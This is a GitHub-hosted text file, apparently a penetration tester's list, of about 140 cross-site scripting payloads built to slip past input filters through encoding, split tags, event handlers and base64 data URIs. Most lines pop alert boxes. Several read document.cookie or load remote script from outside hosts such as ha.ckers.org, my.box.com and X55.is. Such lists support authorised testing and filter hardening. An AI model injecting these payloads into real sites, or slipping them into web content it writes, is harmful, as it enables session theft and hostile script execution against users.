-
Notifications
You must be signed in to change notification settings - Fork 8
/
xss-payloads-by-amoloht.txt
140 lines (140 loc) · 9.37 KB
/
xss-payloads-by-amoloht.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074/AmoloHT/>
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`1`>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
<iframe width="1000px" height="450px" src="https://amoloht.github.io" onload=alert("AmoloHT")>
<svg on=x// //onload=\u0065\u0076\u0061\u006C("alert`/AmoloHT/`")>
<body//%09%09////.//onmousemove='prompt("AmoloHT")'//>
x"//oNeRrOr=`/AmoloHT/`
""onerror=javascript:alert('AmoloHT')
"><u>XSS By AmoloHT</u><marquee+onstart='alert(document.cookie)'>XSS
<noscript><p title="</noscript><img src=x onerror=alert(/AmoloHT/)>">
<svg onload=alert%26%230000000040"1")>
<Svg/Onload=top%5B"al"%2B"ert%5D(1)//
<sc<script>ript>alert(1)</sc</script>ript>
<Svg Id=JavaScrip OnLoad=location=id+'t:/*'+URL>
<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript:aler'+'t'+b+domain+b>
<svg><set onbegin=d=document,b=/`/.source,d[/loca/.source+/tion/.source]=/javascript:aler/.source+/t/.source+b+domain+b>
`/alert?.(1)'"><Svg/OnLoad='`
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<var onmouseover="prompt(1)">On Mouse Over</var>
<a/href="/alert(/AmoloHT/)/">
<a href=//X55.is autofocus onfocus=import(href)>
<a href=javascript:'\74svg/onload\75alert\501\51\76'>
<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<a href="/*">*/)});function+__MobileAppList(){alert(/AmoloHT/)}//>
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnQW1vbG9IVCAnKTwvc2NyaXB0Pg==)
<Img Src="//X55.is/> "OnError=import(src)//
<Img Src="javascript:alert(/AmoloHT/)> 1"OnError=location=src//
javascript:%61lert(/AmoloHT/)
javascript:%26%2337%26%2354%26%2349lert(/AmoloHT/)
JavaScript%26%2358confirm(1)
JavaScript%26%2358AB:confirm(1)
JavaScript%26%2358%0Bconfirm(1)
JavaScript%26%2358$;confirm(1)
JavaScript%26%2358$?confirm(1):0
Set.constructor('ale'+'rt(13)')();
<script>alert(/AmoloHT/)</script>
'><ScripT>alert(/AmoloHT/)</SCripT>
<svg><desc><![CDATA[</desc><script>alert(/AmoloHT/)</script>]]></svg>
JavaScript%26%2358top?confirm(1):0
JavaScript://%250Aalert?.(1)//
<Tag OnEvent="alert/*>*/(1)"
<Svg OnLoad=confirm(1)>%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%http://AFX55.is%C0%A7%C0%A9%C0%BE
function/**/Date(){alert(/AmoloHT/)}
function/**/RegExp(){alert(/AmoloHT/)}
/*-/*`/*\`/*'/*"/**/(/**/oNclick=alert())//%0D%0A%0D%0a//</style/</title/</textarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
<IMG STYLE="xss:expr/*XSS*/ession(alert('AmoloHT'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("AmoloHT"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('AmoloHT');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test" formaction="javascript:alert(/AmoloHT/23)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(/AmoloHT/23)">crosssitespt
<frameset onload=alert(/AmoloHT/23)>
<!--<img src="--><img src=x onerror=alert(/AmoloHT/23)//">
<style><img src="</style><img src=x onerror=alert(/AmoloHT/23)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(/AmoloHT/)">
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("AmoloHT")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(/AmoloHT/)</scr</script>ipt><scr<script>ipt>alert(/AmoloHT/)</scr</script>ipt>
<sCR<script>iPt>alert(/AmoloHT/)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
%253Cscript%253Ealert('AmoloHT')%253C%252Fscript%253E
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(/AmoloHT/)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
\x3Cscript>javascript:alert(/AmoloHT/)</script>
'"`><script>/* *\x2Fjavascript:alert(/AmoloHT/)// */</script>
<script>javascript:alert(/AmoloHT/)</script\x0D
<script>javascript:alert(/AmoloHT/)</script\x0A
<script>javascript:alert(/AmoloHT/)</script\x0B
<script charset="\x22>javascript:alert(/AmoloHT/)</script>
<script>javascript:alert(/AmoloHT/)<\x00/script>
<img src=# onerror\x3D"javascript:alert(/AmoloHT/)" >
<input onfocus=javascript:alert(/AmoloHT/) autofocus>
<input onblur=javascript:alert(/AmoloHT/) autofocus><input autofocus>
<video poster=javascript:javascript:alert(/AmoloHT/)//
<body onscroll=javascript:alert(/AmoloHT/)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(/AmoloHT/)><input></form><button form=test onformchange=javascript:alert(/AmoloHT/)>X
<video><source onerror="javascript:javascript:alert(/AmoloHT/)">
<video onerror="javascript:javascript:alert(/AmoloHT/)"><source>
<form><button formaction="javascript:javascript:alert(/AmoloHT/)">X
<body oninput=javascript:alert(/AmoloHT/)><input autofocus>
<math href="javascript:javascript:alert(/AmoloHT/)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(/AmoloHT/)">CLICKME</maction> </math>
<frameset onload=javascript:alert(/AmoloHT/)>
<table background="javascript:javascript:alert(/AmoloHT/)">
<!--<img src="--><img src=x onerror=javascript:alert(/AmoloHT/)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
<style><img src="</style><img src=x onerror=javascript:alert(/AmoloHT/)//">
<li style=list-style:url() onerror=javascript:alert(/AmoloHT/)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(/AmoloHT/)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(/AmoloHT/)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(/AmoloHT/)</SCRIPT>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(/AmoloHT/)/**/</script /**/
"><h1/onmouseover='\u0061lert(/AmoloHT/)'>
<iframe/src="data:text/html,<svg onload=alert(/AmoloHT/)>">
<meta content="
 1 
; JAVASCRIPT: alert(/AmoloHT/)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(/AmoloHT/)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')